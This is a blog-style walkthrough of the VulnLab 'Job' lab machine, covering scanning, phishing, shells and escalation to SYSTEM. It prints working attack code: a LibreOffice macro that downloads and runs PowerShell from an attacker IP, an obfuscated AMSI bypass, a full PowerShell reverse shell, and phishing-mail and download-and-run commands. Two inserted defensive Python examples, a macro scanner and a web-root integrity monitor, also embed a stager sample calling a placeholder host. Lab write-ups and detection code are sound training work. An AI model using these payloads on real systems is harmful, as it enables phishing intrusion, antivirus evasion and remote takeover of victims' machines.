Penetration Testing - Job - VulnLab | from Phishing to Admin
Enrique A.
CRTP | PNPT | ARTA | Security Engineer with 9+ years of experience in network penetration testing, AD testing, Linux server testing and web application security testing.
Intro
Hey everyone! If you love diving into the world of cybersecurity as much as I do, you'll enjoy this detailed walkthrough of the 'Job' machine from VulnLab. This medium-level challenge not only tested my skills but also gave me some cool insights and tricks to share. Along the way we'll see a practical example of how phishing can be leveraged to get past security defenses.
From scanning ports with RustScan to crafting sneaky payloads and escalating privileges, we'll go through each step together. I've packed this post with practical tips and a bit of my own experience in tackling these kinds of challenges. So whether you're training for your next security gig or just curious about ethical hacking, I hope you'll find something useful here.
RustScan
└─$ rustscan -a 10.10.70.229 --ulimit 5000 -- -A -sC | tee RustScanResults.txt
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Because guessing isn't hacking.
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.70.229:25
Open 10.10.70.229:80
Open 10.10.70.229:445
Open 10.10.70.229:3389
Open 10.10.70.229:5985
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A -sC" on ip 10.10.70.229
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-13 11:32 EEST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:32
Completed NSE at 11:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:32
Completed NSE at 11:32, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:32
Completed NSE at 11:32, 0.00s elapsed
Initiating Ping Scan at 11:32
Scanning 10.10.70.229[2 ports]
Completed Ping Scan at 11:32, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:32
Completed Parallel DNS resolution of 1 host. at 11:32, 4.01s elapsed
DNS resolution of 1 IPs took 4.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 2, CN: 0]
Initiating Connect Scan at 11:32
Scanning 10.10.70.229[5 ports]
Discovered open port 445/tcp on 10.10.70.229
Discovered open port 80/tcp on 10.10.70.229
Discovered open port 3389/tcp on 10.10.70.229
Discovered open port 25/tcp on 10.10.70.229
Discovered open port 5985/tcp on 10.10.70.229
Completed Connect Scan at 11:32, 0.05s elapsed (5 total ports)
Initiating Service scan at 11:32
Scanning 5 services on 10.10.70.229
Completed Service scan at 11:32, 13.70s elapsed (5 services on 1 host)
NSE: Script scanning 10.10.70.229.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:32
NSE Timing: About 99.86% done; ETC: 11:32 (0:00:00 remaining)
Completed NSE at 11:33, 40.08s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:33
Completed NSE at 11:33, 0.75s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:33
Completed NSE at 11:33, 0.00s elapsed
Nmap scan report for 10.10.70.229
Host is up, received syn-ack (0.052s latency).
Scanned at 2024-06-13 11:32:09 EEST for 55s
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-title: Job.local
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds? syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=job
| Issuer: commonName=job
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-12T08:22:53
| Not valid after: 2024-12-12T08:22:53
| MD5: 8539:143c:c2f2:20ad:a550:d6a3:cc5a:8ce7
| SHA-1: f9de:98a4:b31c:5b75:130d:00a7:3991:1c66:983c:8b0e
| -----BEGIN CERTIFICATE-----
| MIICyjCCAbKgAwIBAgIQPzSjYmS+4Y1N6Vynffy6SzANBgkqhkiG9w0BAQsFADAO
| MQwwCgYDVQQDEwNqb2IwHhcNMjQwNjEyMDgyMjUzWhcNMjQxMjEyMDgyMjUzWjAO
| MQwwCgYDVQQDEwNqb2IwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCY
| yNxsspQ55IuJBSIuiUbjGuGkjlFtU3EgeO+LFWzn55NFnFCPyDN0XJOSGhGvnGsw
| t2LfRfoyaQPYeFwxI1NwptlJfGN0RZivELu2gESlxMUYEmvCW/LVcO+nGw8IVE/s
| 37xJX0AXwAICGdLKbidYKG+67eGoXR8WX813h8CfXDu7PiSyxr6nHRMLUXNevOvw
| mDm4kgEaY0moqnk4JEfxDlZJGyipN0o+wQzTBOb3acxzL30hLtGOX3HUKTlOeiN1
| 2NcwTBxZ6gg1cpIlsA+k9BXuirqSJG3wjk71Aiq1MrPsa+NZjfpNa90t6pi0PtDo
| wmUeuXJ1DeNpgVk3jtvxAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsG
| A1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEAPuMfFsI9hAEceX/cdm5WEcPH
| jdWoCX+NGK+PiwrnSQIYhNyB2rbCi641oFKI+eULesLI6KA5c2jgxsLSC2Vv6zLs
| HAL/kLqOJTUkHZDrXvQJOhWUKrfgIOIMYWMXfwXj+YDSQLlC640DzOdUIeaN4Zhk
| 1FeZiZFtdWV7NC5TAY4AiEDG//y8Vx2wAFd24JlnRzUJrETpC46LMDwFTCkltZKW
| PbIn2t9xrxkJAq/lg6c/uD8f1c5GcIGYsIetJxLvRr2m4aNmrIV0ghIKP8IC4FXT
| WIscF/QQLWoUOXKIxhkA4Vqs14GrPtJ83LutWq4EfYpIlmczpY5d0Ozuk4cK9Q==
|_-----END CERTIFICATE-----
|_ssl-date: 2024-06-13T08:33:04+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: JOB
| NetBIOS_Domain_Name: JOB
| NetBIOS_Computer_Name: JOB
| DNS_Domain_Name: job
| DNS_Computer_Name: job
| Product_Version: 10.0.20348
|_ System_Time: 2024-06-13T08:32:24+00:00
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-time:
| date: 2024-06-13T08:32:27
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 38282/tcp): CLEAN (Timeout)
| Check 2 (port 47499/tcp): CLEAN (Timeout)
| Check 3 (port 47727/udp): CLEAN (Timeout)
| Check 4 (port 43111/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
Checking the HTTP Port
The site shows us only one email address: [email protected]
It also states that if you are sending your resume, it should be a LibreOffice document. Interesting. That makes me think we can phish them.
After running dirb against the website for a while, nothing interesting was found.
Checking the SMB port
Access denied:
└─$ smbclient -L 10.10.70.229
Password for [WORKGROUP\kali]:
session setup failed: NT_STATUS_ACCESS_DENIED
Email Phishing
It seems phishing is the way to go. So this is what I did:
1) Created a reverse shell named reverse.ps1
2) Created the following macro to add to the document we will later send (the .odt file built in step 3):
REM ***** BASIC *****
REM Pulls the AMSI bypass and then the reverse shell from the Python HTTP listener started in step 4 (plain HTTP, since python -m http.server does not speak TLS)
Sub Main
Shell("cmd /c powershell -nop -c ""iex (New-Object Net.WebClient).DownloadString('http://10.8.2.116:9090/amsibp.ps1'); iex (New-Object Net.WebClient).DownloadString('http://10.8.2.116:9090/reverse.ps1')""")
End Sub
As you can see, we need two files:
a) the AMSI bypass (amsibp.ps1):
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true);
b) the reverse shell (reverse.ps1):
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
3) Added the macro to the .odt file created with LibreOffice Writer and named it Havoc.odt (before that I had tried a Havoc demon, but AV kept killing it). The following writeup provides a very good example of how to do this:
4) Started an HTTP listener with Python so the files can be downloaded. The files must be in the directory from which we run:
python -m http.server 9090
5) Sent the email with the following command:
swaks --to [email protected] --header "Subject: Application" --body 'Hello, I am attaching the goals requested for the job position. Thank you!' --attach /home/kali/Toys/Havoc/Malicious/Havoc.odt --server job.local
Alternatively, you could use:
sendemail -s job.local -f "[email protected]" -t [email protected] -o tls=no -m "cat https://10.8.2.116:9090/revshellplease" -a /home/kali/Toys/Havoc/Malicious/CV.odt
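The attachment above works because an .odt is just a zip container whose Basic macros sit in Basic/<Library>/<Module>.xml and whose "run on open" wiring lives in an office:event-listeners block inside content.xml. Both are trivially inspectable before anyone opens the file. The scanner below is an added example for this writeup, not tooling used by the author: it unpacks the container in memory, pulls out every Basic module and every event binding, and flags the exact calls the macro above relies on (Shell, powershell, DownloadString, iex). The indicator list and the sample documents it builds are constructed for the example; attacker.example is a placeholder host.

```python
"""Static check for macro-bearing ODF documents (.odt/.ods).

Added example for this writeup, not the author's tooling. An ODF file is a
zip container: Basic macros are stored under Basic/<Library>/<Module>.xml as
the text of a <script:module> element, and a macro meant to fire on open is
bound through <office:scripts>/<office:event-listeners> in content.xml.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Indicator list is an assumption for this example; the first four are exactly
# what the stager macro in the writeup contains.
SUSPICIOUS_PATTERNS = {
    "shell_call": re.compile(r"\bShell\s*\(", re.IGNORECASE),
    "powershell": re.compile(r"powershell", re.IGNORECASE),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.IGNORECASE),
    "invoke_expression": re.compile(r"\biex\b|Invoke-Expression", re.IGNORECASE),
    "wscript_shell": re.compile(r"WScript\.Shell|CreateObject\s*\(", re.IGNORECASE),
}


def extract_macro_modules(data: bytes) -> dict:
    """Return {zip_member: basic_source} for every Basic module in the container."""
    modules = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not (name.startswith("Basic/") and name.endswith(".xml")):
                continue
            # script-lb.xml / script-lc.xml are library indexes, not code.
            if name.rsplit("/", 1)[-1] in ("script-lb.xml", "script-lc.xml"):
                continue
            root = ET.fromstring(zf.read(name))
            if root.tag.endswith("}module"):
                modules[name] = "".join(root.itertext())
    return modules


def extract_event_bindings(data: bytes) -> list:
    """Return event names bound to scripts in content.xml (dom:load = 'Open Document')."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if "content.xml" not in zf.namelist():
            return []
        root = ET.fromstring(zf.read("content.xml"))
    events = []
    for el in root.iter():
        if el.tag.endswith("}event-listener"):
            events.append(next((v for k, v in el.attrib.items()
                                if k.endswith("}event-name")), "unknown"))
    return events


def analyze_odf(data: bytes) -> dict:
    """clean: no macros/bindings; review: macros or bindings, nothing flagged;
    block: suspicious call, or a macro wired to a document event."""
    modules = extract_macro_modules(data)
    events = extract_event_bindings(data)
    findings = [(path, label) for path, src in modules.items()
                for label, pat in SUSPICIOUS_PATTERNS.items() if pat.search(src)]
    if not modules and not events:
        verdict = "clean"
    elif findings or (modules and events):
        verdict = "block"
    else:
        verdict = "review"
    return {"modules": sorted(modules), "event_bindings": events,
            "findings": findings, "verdict": verdict}


def build_sample_odt(macro_source, bind_on_open: bool) -> bytes:
    """Construct a minimal ODF container in memory (test data for this example);
    only the members the scanner inspects are written."""
    listeners = ""
    if bind_on_open:
        listeners = ("<office:scripts><office:event-listeners>"
                     '<script:event-listener script:event-name="dom:load" script:language="ooo:script" '
                     'xlink:href="vnd.sun.star.script:Standard.Module1.Main?language=Basic&amp;location=document"/>'
                     "</office:event-listeners></office:scripts>")
    content_xml = ('<office:document-content '
                   'xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
                   'xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" '
                   'xmlns:xlink="http://www.w3.org/1999/xlink">'
                   f"{listeners}<office:body><office:text/></office:body></office:document-content>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        zf.writestr("content.xml", content_xml)
        if macro_source is not None:
            zf.writestr("Basic/Standard/Module1.xml",
                        '<script:module xmlns:script="http://openoffice.org/2000/script" '
                        'script:name="Module1" script:language="StarBasic">'
                        f"{escape(macro_source)}</script:module>")
    return buf.getvalue()


# Constructed samples: one shaped like the writeup's stager (placeholder host),
# one harmless macro, and one document without any macros.
STAGER_MACRO = ("REM ***** BASIC *****\nSub Main\n"
                "Shell(\"cmd /c powershell -nop -c \"\"iex (New-Object Net.WebClient)"
                ".DownloadString('http://attacker.example/stage.ps1')\"\"\")\nEnd Sub\n")
BENIGN_MACRO = "Sub Main\nMsgBox \"Hello\"\nEnd Sub\n"

if __name__ == "__main__":
    for label, doc in (("stager", build_sample_odt(STAGER_MACRO, True)),
                       ("benign", build_sample_odt(BENIGN_MACRO, False)),
                       ("plain", build_sample_odt(None, False))):
        print(label, analyze_odf(doc))
```

Wired into a mail gateway or an upload handler, a "block" verdict stops the attachment before the recipient's LibreOffice ever sees it; "review" is where a human (or a sandbox) looks at macro-bearing documents that do not match the indicator list.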
Creating a Havoc Demon
Now that we have a reverse shell, we can deploy a Havoc demon to get more stable access to this machine.
1) We create the listener:
2) Once we have the listener ready, we create a payload:
3) We put the payload in the same directory as our HTTP listener (python -m http.server 9090) and then run the following on the target (wget here is PowerShell's alias for Invoke-WebRequest, and the listener serves plain HTTP):
wget http://10.x.x.x:9090/job.exe -OutFile job.exe; .\job.exe
Checking our privileges on this machine shows that there is not much we can do at this point:
Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Privilege Escalation
After checking the files and folders on this machine, I noticed that inetpub/wwwroot is writable, which lets us upload files to the website (as we saw in the nmap results, port 80 is open).
We can create a new .aspx file containing another reverse shell.
a) We create the payload:
b) We upload the file to C:\inetpub\wwwroot\
c) Once it is uploaded, we start our listener and browse to http://job.local/reverse.aspx (the site only listens on port 80), and we should get the shell:
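The weakness exploited here is a web root that the low-privilege account can write to, so that a new .aspx dropped into C:\inetpub\wwwroot is executed by IIS. From the defender's side the cheapest signal is the file itself: a content hash baseline of the web root, taken from a known-good deployment and diffed on a schedule, shows the new server-side script the moment it lands. The monitor below is an added example for this writeup, not code from the author; it builds a throwaway web root with constructed file names, baselines it, and then simulates exactly the change made in this step.

```python
"""File-integrity check for a web root.

Added example for this writeup, not part of the original post. snapshot()
hashes every file under a directory; diff_snapshots() reports what was added,
changed or removed and raises an alert for anything with a server-side script
extension. The web-root layout in demo() is constructed sample data.
"""
import hashlib
import pathlib
import tempfile

# Extensions that IIS/ASP.NET (and common sibling stacks) execute server-side.
SCRIPT_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp", ".php", ".jsp", ".cshtml"}


def snapshot(root) -> dict:
    """Map each file (relative POSIX path) under root to its SHA-256 hex digest."""
    root = pathlib.Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def diff_snapshots(baseline: dict, current: dict) -> dict:
    """Compare two snapshots; added or changed files with a script extension are alerts."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p])
    alerts = [p for p in added + changed
              if pathlib.PurePosixPath(p).suffix.lower() in SCRIPT_EXTENSIONS]
    return {"added": added, "removed": removed, "changed": changed, "alerts": alerts}


def demo() -> dict:
    """Baseline a constructed web root, then simulate the post-exploitation change:
    a static page edited and a reverse.aspx dropped next to it."""
    with tempfile.TemporaryDirectory() as d:
        root = pathlib.Path(d)
        (root / "css").mkdir()
        (root / "index.html").write_text("<h1>Job.local</h1>\n")
        (root / "css" / "site.css").write_text("body { margin: 0 }\n")
        baseline = snapshot(root)

        # The change the escalation step makes: the only file content here is a
        # placeholder, since the check is about the file appearing at all.
        (root / "index.html").write_text("<h1>Job.local</h1><!-- edited -->\n")
        (root / "reverse.aspx").write_text("<!-- placeholder contents -->\n")
        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    result = demo()
    print("added:  ", result["added"])
    print("changed:", result["changed"])
    print("removed:", result["removed"])
    print("ALERT:  ", result["alerts"])
```

On a real host you would run snapshot() against C:\inetpub\wwwroot from a scheduled task running as a separate account, keep the baseline off the box, and pair an alert with the IIS request log for the same path; the longer-term fix is simply an ACL on the web root that denies write access to the application pool identity and other non-admin principals.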
Checking the privileges:
SeImpersonatePrivilege is enabled.
Pwning the machine
Now we need to elevate privileges once more, this time to SYSTEM. For this we can use GodPotato, which abuses the SeImpersonatePrivilege we just found enabled.
I will run it from Havoc with this command:
dotnet inline-execute /home/kali/Toys/Havoc/Malicious/GodPotato-NET35.exe -cmd C:\temp\job.exe
Once it runs, we should get another agent in Havoc.
In my case the previous agent died, but the new agent running as SYSTEM connected properly:
Now we can proceed to extract the flag:
Conclusions
And there you have it—our journey through the 'Job' machine at VulnLab comes to an end! I hope this walkthrough not only shed light on some intricate cybersecurity tactics but also sparked your enthusiasm to dive deeper into the world of ethical hacking.
As we navigated through port scanning, payload crafting, and finally gaining that satisfying shell access, remember, each step is a learning opportunity. Whether you breezed through or hit a few bumps along the way, what matters most is the experience and knowledge you've gained.